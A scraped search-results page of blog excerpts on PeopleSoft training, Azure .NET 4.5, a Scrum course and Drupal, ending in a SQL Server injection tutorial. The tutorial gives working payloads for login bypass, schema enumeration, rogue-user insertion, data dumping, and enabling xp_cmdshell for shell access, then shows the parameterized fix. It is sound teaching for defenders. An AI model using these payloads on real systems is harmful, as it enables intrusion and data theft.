Search Results

Search found 13810 results on 553 pages for 'security roles'.


  • PeopleSoft 9.2 Financial Management Training – Now Available

    - by Di Seghposs
    A guest post from Oracle University.... Whether you’re part of a project team implementing PeopleSoft 9.2 Financials for your company or a partner implementing for your customer, you should attend some of the new training courses.  Everyone knows project team training is critical at the start of a new implementation, including configuration training on the core application modules being implemented. Oracle offers these courses to help customers and partners understand the functionality most relevant to complete end-to-end business processes, to identify any additional development work that may be necessary to customize applications, and to ensure integration between different modules within the overall business process. Training will provide you with the skills and knowledge needed to ensure a smooth, rapid and successful implementation of your PeopleSoft applications in support of your organization’s financial management processes - including step-by-step instruction for implementing, using, and maintaining your applications. It will also help you understand the application and configuration options to make the right implementation decisions. Courses vary based on your role in the implementation and on-going use of the application, and should be a part of every implementation plan, whether it is for an upgrade or a new rollout. Here’s some of the roles that should consider training: · Configuration or functional implementers · Implementation Consultants (Oracle partners) · Super Users · Business Analysts · Financial Reporting Specialists · Administrators PeopleSoft Financial Management Courses: New Features Course: · PeopleSoft Financial Solutions Rel 9.2 New Features Functional Training: · PeopleSoft General Ledger Rel 9.2 · PeopleSoft Payables Rel 9.2 · PeopleSoft Receivables Rel 9.2 · PeopleSoft Asset Management Rel 9.2 · Expenses Rel 9.2 · PeopleSoft Project Costing Rel 9.2 · PeopleSoft Billing Rel 9.2 · PeopleSoft PS / nVision for General Ledger Rel 9.2 Accelerated Courses (include content from two courses for more experienced team members): · PeopleSoft General Ledger Foundation Accelerated Rel 9.2 · PeopleSoft Billing / Receivables Accelerated Rel 9.2 · PeopleSoft Purchasing / Payable Accelerated Rel 9.2 View PeopleSoft Training Overview Video

    Read the article

  • .NET 4.5 now supported with Windows Azure Web Sites

    - by ScottGu
    This week we finished rolling out .NET 4.5 to all of our Windows Azure Web Site clusters.  This means that you can now publish and run ASP.NET 4.5 based apps, and use  .NET 4.5 libraries and features (for example: async and the new spatial data-type support in EF), with Windows Azure Web Sites.  This enables a ton of really great capabilities - check out Scott Hanselman’s great post of videos that highlight a few of them. Visual Studio 2012 includes built-in publishing support to Windows Azure, which makes it really easy to publish and deploy .NET 4.5 based sites within Visual Studio (you can deploy both apps + databases).  With the Migrations feature of EF Code First you can also do incremental database schema updates as part of publishing (which enables a really slick automated deployment workflow). Each Windows Azure account is eligible to host 10 free web-sites using our free-tier.  If you don’t already have a Windows Azure account, you can sign-up for a free trial and start using them today. In the next few days we’ll also be releasing support for .NET 4.5 and Windows Server 2012 with Windows Azure Cloud Services (Web and Worker Roles) – together with some great new Azure SDK enhancements.  Keep an eye out on my blog for details about these soon. Hope this helps, Scott P.S. In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu
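
    For a concrete sense of what this unlocks, here is a minimal, illustrative sketch (not from Scott's post) of an ASP.NET MVC 4 controller action using the .NET 4.5 async/await support now available on Windows Azure Web Sites; the controller name and feed URL are placeholders.

        using System.Net.Http;
        using System.Threading.Tasks;
        using System.Web.Mvc;

        public class NewsController : Controller
        {
            // async/await (new in .NET 4.5) keeps the request thread free while the HTTP call is in flight.
            public async Task<ActionResult> Headlines()
            {
                using (var client = new HttpClient())
                {
                    // Placeholder URL for illustration only.
                    string feed = await client.GetStringAsync("http://example.com/feed");
                    return Content(feed, "text/plain");
                }
            }
        }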

    Read the article

  • Professional Scrum Developer (.NET) Training in London

    - by Martin Hinshelwood
    On the 26th - 30th July in Microsoft’s offices in London Adam Cogan from SSW will be presenting the first Professional Scrum Developer course in the UK. I will be teaching this course alongside Adam and it is a fantastic experience. You are split into teams and go head-to-head to deliver units of potentially shippable work in four two-hour sprints. The Professional Scrum Developer course is the only course endorsed by both Microsoft and Ken Schwaber, and they have worked together very effectively in bringing this course to fruition. This course is the brain child of Richard Hundhausen, a Microsoft Regional Director, and both Adam and I attended the Trainer Prep in Sydney when he was there earlier this year. He is a fantastic trainer and no matter where you do this course you can be safe in the knowledge that he has trained and vetted all of the teachers. A tools version of Ken, if you will. Find a course and register Download this syllabus Download the Scrum Guide What is the Professional Scrum Developer course all about? The Professional Scrum Developer course is a unique and intensive five-day experience for software developers. The course guides teams on how to turn product requirements into potentially shippable increments of software using the Scrum framework, Visual Studio 2010, and modern software engineering practices. Attendees will work in self-organizing, self-managing teams using a common instance of Team Foundation Server 2010. Who should attend this course? This course is suitable for any member of a software development team – architect, programmer, database developer, tester, etc. Entire teams are encouraged to attend and experience the course together, but individuals are welcome too. Attendees will self-organize to form cross-functional Scrum teams. These teams require an aggregate of skills specific to the selected case study. Please see the last page of this document for specific details. Product Owners, ScrumMasters, and other stakeholders are welcome too, but keep in mind that everyone who attends will be expected to commit to work and pull their weight on a Scrum team. What should you know by the end of the course? Scrum will be experienced through a combination of lecture, demonstration, discussion, and hands-on exercises. Attendees will learn how to do Scrum correctly while being coached and critiqued by the instructor, in the following topic areas:
    · Form effective teams
    · Explore and understand legacy “Brownfield” architecture
    · Define quality attributes, acceptance criteria, and “done”
    · Create automated builds
    · How to handle software hotfixes
    · Verify that bugs are identified and eliminated
    · Plan releases and sprints
    · Estimate product backlog items
    · Create and manage a sprint backlog
    · Hold an effective sprint review
    · Improve your process by using retrospectives
    · Use emergent architecture to avoid technical debt
    · Use Test Driven Development as a design tool
    · Set up and leverage continuous integration
    · Use Test Impact Analysis to decrease testing times
    · Manage SQL Server development in an Agile way
    · Use .NET and T-SQL refactoring effectively
    · Build, deploy, and test SQL Server databases
    · Create and manage test plans and cases
    · Create, run, record, and play back manual tests
    · Set up a branching strategy and branch code
    · Write more maintainable code
    · Identify and eliminate people and process dysfunctions
    · Inspect and improve your team’s software development process
    What does the week look like?
This course is a mix of lecture, demonstration, group discussion, simulation, and hands-on software development. The bulk of the course will be spent working as a team on a case study application delivering increments of new functionality in mini-sprints. Here is the week at a glance: Monday morning and most of the day Friday will be spent with the computers powered off, so you can focus on sharpening your game of Scrum and avoiding the common pitfalls when implementing it.
The Sprints
Timeboxing is a critical concept in Scrum as well as in this course. We expect each team and student to understand and obey all of the timeboxes. The timebox duration will always be clearly displayed during each activity. Expect the instructor to enforce it. Each of the ½ day sprints will roughly follow this schedule:
Component | Description | Minutes
Instruction | Presentation and demonstration of new and relevant tools & practices | 60
Sprint planning meeting | Product owner presents backlog; each team commits to delivering functionality | 10
Sprint planning meeting | Each team determines how to build the functionality | 10
The Sprint | The team self-organizes and self-manages to complete their tasks | 120
Sprint Review meeting | Each team will present their increment of functionality to the other teams | 30
Sprint Retrospective | A group retrospective meeting will be held to inspect and adapt | 10
Each team is expected to self-organize and manage their own work during the sprint. Pairing is highly encouraged. The instructor/product owner will be available if there are questions or impediments, but will be hands-off by default. You should be prepared to communicate and work with your team members in order to achieve your sprint goal. If you have development-related questions or get stuck, your partner or team should be your first level of support. Module 1: INTRODUCTION This module provides a chance for the attendees to get to know the instructors as well as each other. The Professional Scrum Developer program, as well as the day by day agenda, will be explained. Finally, the Scrum team will be selected and assembled so that the forming, storming, norming, and performing can begin. Trainer and student introductions Professional Scrum Developer program Agenda Logistics Team formation Retrospective Module 2: SCRUMDAMENTALS This module provides a level-setting understanding of the Scrum framework including the roles, timeboxes, and artifacts. The team will then experience Scrum firsthand by simulating a multi-day sprint of product development, including planning, review, and retrospective meetings. Scrum overview Scrum roles Scrum timeboxes (ceremonies) Scrum artifacts Simulation Retrospective It’s required that you read Ken Schwaber’s Scrum Guide in preparation for this module and course. MODULE 3: IMPLEMENTING SCRUM IN VISUAL STUDIO 2010 This module demonstrates how to implement Scrum in Visual Studio 2010 using a Scrum process template*. The team will learn the mapping between the Scrum concepts and how they are implemented in the tool. After connecting to the shared Team Foundation Server, the team members will then return to the simulation – this time using Visual Studio to manage their product development. Mapping Scrum to Visual Studio 2010 User Story work items Task work items Bug work items Demonstration Simulation Retrospective Module 4: THE CASE STUDY In this module the team is introduced to their problem domain for the week.
A kickoff meeting by the Product Owner (the instructor) will set the stage for the why and what that will take during the upcoming sprints. The team will then define the quality attributes of the project and their definition of “done.” The legacy application code will be downloaded, built, and explored, so that any bugs can be discovered and reported. Introduction to the case study Download the source code, build, and explore the application Define the quality attributes for the project Define “done” How to file effective bugs in Visual Studio 2010 Retrospective Module 5: HOTFIX This module drops the team directly into a Brownfield (legacy) experience by forcing them to analyze the existing application’s architecture and code in order to locate and fix the Product Owner’s high-priority bug(s). The team will learn best practices around finding, testing, fixing, validating, and closing a bug. How to use Architecture Explorer to visualize and explore Create a unit test to validate the existence of a bug Find and fix the bug Validate and close the bug Retrospective Module 6: PLANNING This short module introduces the team to release and sprint planning within Visual Studio 2010. The team will define and capture their goals as well as other important planning information. Release vs. Sprint planning Release planning and the Product Backlog Product Backlog prioritization Acceptance criteria and tests Sprint planning and the Sprint Backlog Creating and linking Sprint tasks Retrospective At this point the team will have the knowledge of Scrum, Visual Studio 2010, and the case study application to begin developing increments of potentially shippable functionality that meet their definition of done. Module 7: EMERGENT ARCHITECTURE This module introduces the architectural practices and tools a team can use to develop a valid design on which to develop new functionality. The teams will learn how Scrum supports good architecture and design practices. After the discussion, the teams will be presented with the product owner’s prioritized backlog so that they may select and commit to the functionality they can deliver in this sprint. Architecture and Scrum Emergent architecture Principles, patterns, and practices Visual Studio 2010 modeling tools UML and layer diagrams SPRINT 1 Retrospective Module 8: TEST DRIVEN DEVELOPMENT This module introduces Test Driven Development as a design tool and how to implement it using Visual Studio 2010. To maximize productivity and quality, a Scrum team should setup Continuous Integration to regularly build every team member’s code changes and run regression tests. Refactoring will also be defined and demonstrated in combination with Visual Studio’s Test Impact Analysis to efficiently re-run just those tests which were impacted by refactoring. Continuous integration Team Foundation Build Test Driven Development (TDD) Refactoring Test Impact Analysis SPRINT 2 Retrospective Module 9: AGILE DATABASE DEVELOPMENT This module lets the SQL Server database developers in on a little secret – they can be agile too. By using the database projects in Visual Studio 2010, the database developers can join the rest of the team. The students will see how to apply Agile database techniques within Visual Studio to support the SQL Server 2005/2008/2008R2 development lifecycle. 
Agile database development Visual Studio database projects Importing schema and scripts Building and deploying Generating data Unit testing SPRINT 3 Retrospective Module 10: SHIP IT Teams need to know that just because they like the functionality doesn’t mean the Product Owner will. This module revisits acceptance criteria as it pertains to acceptance testing. By refining acceptance criteria into manual test steps, team members can execute the tests, recording the results and reporting bugs in a number of ways. Manual tests will be defined and executed using the Microsoft Test Manager tool. As the Sprint completes and an increment of functionality is delivered, the team will also learn why and when they should create a branch of the codeline. Acceptance criteria Testing in Visual Studio 2010 Microsoft Test Manager Writing and running manual tests Branching SPRINT 4 Retrospective Module 11: OVERCOMING DYSFUNCTION This module introduces the many types of people, process, and tool dysfunctions that teams face in the real world. Many dysfunctions and scenarios will be identified, along with ideas and discussion for how a team might mitigate them. This module will enable you and your team to move toward independence and improve your game of Scrum when you depart class. Scrum-butts and flaccid Scrum Best practices working as a team Team challenges ScrumMaster challenges Product Owner challenges Stakeholder challenges Course Retrospective What will be expected of you and your team? This is a unique course in that it’s technically-focused, team-based, and employs timeboxes. It demands that the members of the teams self-organize and self-manage their own work to collaboratively develop increments of software. All attendees must commit to: Pay attention to all lectures and demonstrations Participate in team and group discussions Work collaboratively with other team members Obey the timebox for each activity Commit to work and do your best to deliver All teams should have these skills: Understanding of Scrum Familiarity with Visual Studio 2010 C#, .NET 4.0 & ASP.NET 4.0 experience* SQL Server 2008 development experience Software testing experience * Check with the instructor ahead of time for the exact technologies Self-organising teams Another unique attribute of this course is that it’s a technical training class being delivered to teams of developers, not pairs, and not individuals. Ideally, your actual software development team will attend the training to ensure that all necessary skills are covered. However, if you wish to attend an open enrolment course alone or with just a couple of colleagues, realize that you may be placed on a team with other attendees. The instructor will do his or her best to ensure that each team is cross-functional to tackle the case study, but there are no guarantees. You may be required to try a new role, learn a new skill, or pair with somebody unfamiliar to you. This is just good Scrum! Who should NOT take this course?
Because of the nature of this course, as explained above, certain types of people should probably not attend this course: Students requiring command and control style instruction – there are no prescriptive/step-by-step (think traditional Microsoft Learning) labs in this course Students who are unwilling to work within a timebox Students who are unwilling to work collaboratively on a team Students who don’t have any skill in any of the software development disciplines Students who are unable to commit fully to their team – not only will this diminish the student’s learning experience, but it will also impact their team’s learning experience Find a course and register Download this syllabus Download the Scrum Guide Technorati Tags: Scrum,SSW,Pro Scrum Dev

    Read the article

  • Drupal CMS most Stable for High Traffic

    - by Aditi
    Drupal users report higher satisfaction with Drupal than Joomla users do with Joomla, for a number of reasons. If you are choosing a high-performance platform to run a high-traffic website, a Drupal installation is a strong choice.
    Overload Scenario
    Drupal is a scalable, high-performance CMS and is stable under heavy load. If your server is pushed beyond its capacity, Drupal shuts off gracefully and doesn’t crash. As soon as the server is back within its traffic capability, Drupal handles all requests smoothly again. For example, if your dedicated server can handle a maximum of 50,000 visits a day, and on a lucky day your news creates a buzz in social media and traffic rises to 70,000, your server will be overloaded; with many systems it crashes, sometimes causing permanent damage to your database. A Drupal site instead closes down gracefully, and as soon as traffic drops back within the server’s capacity it accepts all requests again.
    Extensibility
    Drupal users know that their add-ons integrate better with the core, and the framework makes it easier to extend the CMS’s capabilities, which keeps an extended installation quite stable - unlike Joomla, which loses its strength if you have plenty of plugins and heavy customizations running. Any CMS with a large number of plugins makes the content pipeline more complex and reduces its ability to handle high-traffic requests.
    Accessibility Management or ACL
    Chances are that if you run a high-traffic website you have various users and content contributors. ACL means group roles: assigning people to the various registered user levels and allocating different kinds of privileges. The most common example is the ability to see or edit a section or selected pages. This efficient feature of Drupal sets it a class apart from other CMSs out there.

    Read the article

  • Oracle’s AutoVue Enables Visual Decision Making

    - by Pam Petropoulos
    That old saying about a picture being worth a thousand words has never been truer.  Check out the latest reports from IDC Manufacturing Insights which highlight the importance of incorporating visual information in all facets of decision making and the role that Oracle’s AutoVue Enterprise Visualization solutions can play. Take a look at the excerpts below and be sure to click on the titles to read the full reports. Technology Spotlight: Optimizing the Product Life Cycle Through Visual Decision Making, August 2012 Manufacturers find it increasingly challenging to make effective product-related decisions as the result of expanded technical complexities, elongated supply chains, and a shortage of experienced workers. These factors challenge the traditional methodologies companies use to make critical decisions. However, companies can improve decision making by the use of visual decision making, which synthesizes information from multiple sources into highly usable visual context and integrates it with existing enterprise applications such as PLM and ERP systems. Product-related information presented in a visual form and shared across communities of practice with diverse roles, backgrounds, and job skills helps level the playing field for collaboration across business functions, technologies, and enterprises. Visual decision making can contribute to manufacturers making more effective product-related decisions throughout the complete product life cycle. This Technology Spotlight examines these trends and the role that Oracle's AutoVue and its Augmented Business Visualization (ABV) solution play in this strategic market. Analyst Connection: Using Visual Decision Making to Optimize Manufacturing Design and Development, September 2012 In today's environments, global manufacturers are managing a broad range of information. Data is often scattered across countless files throughout the product life cycle, generated by different applications and platforms. Organizations are struggling to utilize these multidisciplinary sources in an optimal way. Visual decision making is a strategy and technology that can address this challenge by integrating and widening access to digital information assets. Integrating with PLM and ERP tools across engineering, manufacturing, sales, and marketing, visual decision making makes digital content more accessible to employees and partners in the supply chain. The use of visual decision-making information rendered in the appropriate business context and shared across functional teams contributes to more effective product-related decision making and positively impacts business performance.

    Read the article

  • SyncToBlog #10 Lots of Azure and Cloud Links including MIX10 videos

    - by Eric Nelson
    Just getting a few interesting cloud links “down on paper”. I last did one of these on Azure in Feb 20010. Cloud Links: Article on Debugging in the Cloud http://code.msdn.microsoft.com/azurescale  A sample app that demonstrates monitoring and automatically scaling an Azure application in response to dropping performance etc. Basically a console app that checks perf stats and then uses the Service Management API to spin up new instances when needed. Azure In Action book is imminent :) Running Memcached in Windows Azure from the MS UK team Using Microsoft Codename Dallas as a data source for Drupal also from the MS UK team I often mention them – but this post is the biz! Metodi on fault and upgrade domains Detailed blog post on comparing Azure AppFabric Service Bus REST support to the free Faye Ruby+JavaScript gem that implements the JSON publish/subscribe protocol Bayeux. AppFabric LABS allow you to test out and play with experimental AppFabric technologies. Details of the upcoming VM support in Windows Azure Nice series of posts from J D Meier in the Patterns and Practice team How To Use ASP.NET Forms Auth with Azure Tables  How To Use ASP.NET Forms Auth with Roles in Azure Tables How To Use ASP.NET Forms Auth with SQL Server on Windows Azure And sessions from MIX10 held March 15th to 17th: Lap around the Windows Azure Platform – Steve Marx Building and Deploying Windows Azure Based Applications with Microsoft Visual Studio 2010 – Jim Nakashima Building PHP Applications using the Windows Azure Platform – Craig Kitterman, Sumit Chawla Using Ruby on Rails to Build Windows Azure Applications – Sriram Krishnan Microsoft Project Code Name “Dallas": Data for your apps – Moe Khosravy Using Storage in the Windows Azure Platform – Chris Auld Building Web Applications with Windows Azure Storage – Brad Calder Building Web Application with Microsoft SQL Azure – David Robinson Connecting Your Applications in the Cloud with Windows Azure AppFabric – Clemens Vasters Microsoft Silverlight and Windows Azure: A Match Made for the Web – Matt Kerner Something for everyone :)

    Read the article

  • What is your definition of a programmer?

    - by Amir Rezaei
    The definition of a programmer is not obvious. It has happened that I have asked questions in this forum where people believe they don’t belong here because they’re not programmer related. I thought this question may clarify the definition. What characteristics, roles and activities do you think define a programmer? Is there a typical programmer? The technology changes so fast that it may be hard to be a typical programmer. From Wikipedia: A programmer, computer programmer or coder is someone who writes computer software. The term computer programmer can refer to a specialist in one area of computer programming or to a generalist who writes code for many kinds of software. One who practices or professes a formal approach to programming may also be known as a programmer analyst. A programmer's primary computer language (C, C++, Java, Lisp, Delphi etc.) is often prefixed to the above titles, and those who work in a web environment often prefix their titles with web. The term programmer can be used to refer to a software developer, software engineer, computer scientist, or software analyst. However, members of these professions typically possess other software engineering skills, beyond programming; for this reason, the term programmer is sometimes considered an insulting or derogatory oversimplification of these other professions. This has sparked much debate amongst developers, analysts, computer scientists, programmers, and outsiders who continue to be puzzled at the subtle differences in these occupations.

    Read the article

  • TFS 2010 Server Name Change

    - by PearlFactory
    So I thought I would change the name of my machine so that the other devs can find the TFS server easily. TFS 2005 had the handy command-line utility TFSAdminUtil... alas, it is now gone. Here are the steps to complete the change.
    Edit the web.config, usually located (on a default install) at C:\Program Files\Microsoft Team Foundation Server 2010\Application Tier\Web Services\web.config:
    <add key="applicationDatabase" value="Data Source=JUSTIN\SQLI01;Initial Catalog=Tfs_Configuration;Integrated Security=True;" />
    Next, edit previous solutions/projects:
    1) Open the solution file, e.g. ProductApp.sln
    2) Edit the SccTeamFoundationServer URL under the Global section, changing it to the new name
    If the DB server is on the same machine, you will need to remove the existing DB user account assigned to the TFS databases: remove the old [%machine_name%] value, i.e. the Tuned_Dev_PC_12\Justin user, from the above DBs. Now add the new Justin\Justin user account associated with the new machine name to the TFS and Reporting DBs; dbo or the TFSADMIN & TFSEXEC roles will do in this case (or add both). Then either reapply the user or add the new account (removing the old Tuned_Dev_PC_12\justin account). If the DB permissions are set up correctly you will get a screen confirming this; if it pauses or gets stuck, look back at granting the correct DB permissions to the JUSTIN\Justin user account.
    Also, if your project is still complaining about the old TFS name:
    1) Team \ Connect to Team Foundation Server
    2) Add/Remove TFS
    3) Add the new TFS name
    Once you have connected to the new TFS server, reload your project from TFS; this removes a lot of the bugs that hang around in the local project/solution. This is similar to a VSS 2005 and older fix. Cheers. (ETA about 60-90 mins, so weigh up the need vs payoff.) Shutdown, restart.

    Read the article

  • .NET 4.5 is now supported on Windows Azure Web Sites

    - by Leniel Macaferi
    This week we finished installing .NET 4.5 on all of our clusters that host Windows Azure Web Sites. This means that you can now publish and run applications based on ASP.NET 4.5, and use .NET 4.5 libraries and features (for example: async and the new spatial data type support in the Entity Framework), with Windows Azure Web Sites. This enables a ton of great capabilities - check out Scott Hanselman's post with videos (in English) that highlight a few of them. Visual Studio 2012 includes built-in support for publishing an application to Windows Azure, which makes it very easy to publish and deploy .NET 4.5 based sites from within Visual Studio (you can publish apps + databases). With the Migrations feature of the Entity Framework Code First approach you can also make incremental database schema updates as part of the publishing process (which enables a highly automated deployment workflow). Each Windows Azure account is eligible to host up to 10 web sites for free, using our "Shared" scaling tier. If you don't yet have a Windows Azure account, you can sign up for a free trial and start using these features today. In the next few days we will also release support for .NET 4.5 and Windows Server 2012 for Windows Azure Cloud Services (Web and Worker Roles) - along with some great new improvements to the Windows Azure SDK. Keep an eye on my blog for more information about these releases soon. Hope this helps, - Scott. PS: In addition to the blog, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/ScottGu. Translated from the original post by Leniel Macaferi.

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will become clear as we walk through two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability:
    1) Concatenating SQL statements on the client by hand
    2) Using parameterized stored procedures but passing in parts of SQL statements
    As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem.
    Concatenating SQL statements on the client
    This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data, then the C# code with the actual SQL Injection example from beginning to end. The comments in the code provide information on what actually happens.
    /* SQL CODE */
    /* Users table holds usernames and passwords and is the object of our hacking attempt */
    CREATE TABLE Users
    (
        UserId INT IDENTITY(1, 1) PRIMARY KEY,
        UserName VARCHAR(50),
        UserPassword NVARCHAR(10)
    )
    /* Insert 2 users */
    INSERT INTO Users(UserName, UserPassword)
    SELECT 'User 1', 'MyPwd' UNION ALL
    SELECT 'User 2', 'BlaBla'
    Vulnerable C# code, followed by a progressive SQL injection attack.
    /* .NET C# CODE */
    /* This method checks if a user exists.
It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. 
It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. 
/* The fixed C# method that doesn't suffer from SQL injection because it uses parameters. */
private bool DoesUserExist(string username, string password)
{
    using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;"))
    {
        // This is the version of the SQL string that should be safe from SQL injection
        string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password";
        SqlCommand cmd = conn.CreateCommand();
        cmd.CommandText = sql;
        cmd.CommandType = CommandType.Text;
        // adding 2 SQL Parameters solves the SQL injection issue completely
        SqlParameter usernameParameter = new SqlParameter();
        usernameParameter.ParameterName = "@username";
        usernameParameter.DbType = DbType.String;
        usernameParameter.Value = username;
        cmd.Parameters.Add(usernameParameter);
        SqlParameter passwordParameter = new SqlParameter();
        passwordParameter.ParameterName = "@password";
        passwordParameter.DbType = DbType.String;
        passwordParameter.Value = password;
        cmd.Parameters.Add(passwordParameter);
        cmd.Connection.Open();
        DataSet dsResult = new DataSet();
        /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */
        string userExists = (cmd.ExecuteScalar() ?? "0").ToString();
        return userExists != "0";
    }
}
We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period.
Incorrect parameterization in stored procedures
It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup.
/* Create a single master access stored procedure */
CREATE PROCEDURE spSingleAccessSproc
(
    @select NVARCHAR(500) = '',
    @tableName NVARCHAR(500) = '',
    @where NVARCHAR(500) = '1=1',
    @orderBy NVARCHAR(500) = '1'
)
AS
EXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)
GO
/* Valid use as anticipated by a novice developer */
EXEC spSingleAccessSproc
    @select = '*',
    @tableName = 'Users',
    @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''',
    @orderBy = 'UserID'
/* Malicious use: SQL injection. The SQL injection principles are the same as with the SQL string concatenation I described earlier, so I won't repeat them again here. */
EXEC spSingleAccessSproc
    @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --',
    @tableName = '--Users',
    @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''',
    @orderBy = '--UserID'
